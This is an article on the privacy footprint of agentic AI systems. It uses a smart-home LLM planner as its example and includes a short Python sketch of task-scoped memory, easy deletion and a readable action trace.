AI browsers like ChatGPT Atlas may redefine digital interaction, but they also test the boundaries of data ethics and security. As this technology evolves, maintaining user trust will depend on transparency, accountability, and strict privacy protection.
That's the hidden price of agentic AI: every plan, action, and prompt gets recorded, and forecasts and logs hinting at your regular routines end up in long-term storage.
These logs aren't careless mistakes; they are standard behaviour for most agentic AI systems. Fortunately, there's another way: straightforward engineering methods can preserve efficiency and autonomy while limiting the digital footprint.
Consider a smart-home system that uses an LLM-based planner to coordinate devices throughout the house. It monitors electricity prices and weather data, configures thermostats, adjusts smart plugs, and schedules EV charging.
To limit personal data, the system stores only pseudonymous resident profiles locally and doesn't access microphones or cameras. The agent updates its plan when the weather or prices change, and records short, planned reflections to improve future runs.
However, as a resident you may not be aware of how much private data is being stored behind your back. Agentic AI systems generate information as a natural consequence of how they function, and in most baseline agent configurations that data simply accumulates. This is not considered best practice in the industry, even if such a configuration is a practical starting point for getting agentic AI up and running smoothly.
Three practices limit the footprint, as sketched below:
• Limit memory to the task at hand.
• Make deletion thorough and easy.
• Make the agent's actions transparent via a readable "agent trace."
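Here is a minimal sketch of those three practices, with every name hypothetical: memory scoped to a single task with an expiry, one-call deletion, and a human-readable trace of every action.

```python
# Minimal sketch of privacy-conscious agent memory. All class and method
# names are hypothetical; the three practices above are the point.
import json, time

class AgentSession:
    def __init__(self, task: str, ttl_seconds: int = 3600):
        self.task, self.expires = task, time.time() + ttl_seconds
        self.memory: dict = {}        # scoped to this task only
        self.trace: list[str] = []    # human-readable record of actions

    def remember(self, key, value):
        assert time.time() <= self.expires, "task memory expired"
        self.memory[key] = value
        self.trace.append(f"stored {key} for task {self.task!r}")

    def act(self, description: str):
        self.trace.append(f"action: {description}")

    def forget_all(self):
        self.memory.clear()           # thorough, single-call deletion
        self.trace.append("memory wiped")

session = AgentSession("precool house before peak pricing", ttl_seconds=900)
session.remember("target_temp", 21)
session.act("set thermostat to 21C at 16:45")
session.forget_all()
print(json.dumps(session.trace, indent=2))  # the readable agent trace
```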